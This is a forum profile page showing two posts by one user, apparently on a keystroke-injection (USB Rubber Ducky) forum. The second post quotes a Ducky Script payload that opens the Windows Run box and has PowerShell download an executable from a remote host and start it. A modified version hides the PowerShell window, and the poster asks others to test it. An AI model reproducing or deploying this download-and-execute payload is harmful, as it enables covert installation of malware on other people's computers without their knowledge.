Jump to content

Morda75

Members
  • Posts

    2
  • Joined

  • Last visited

Everything posted by Morda75

  1. Ah after some dabbling with it and familiarizing myself I got this to work.
  2. Powershell Wget + Execute Author: mubix Duckencoder: 1.2 Target: Windows 7 Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies. GUI rDELAY 100STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"ENTER Adding two words to this makes it possible to hide the powershell window as it downloads and executes. GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old,%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" ENTER I am having some problems with this payload basically nothing happens.Can someone test it to confirm?
×
×
  • Create New...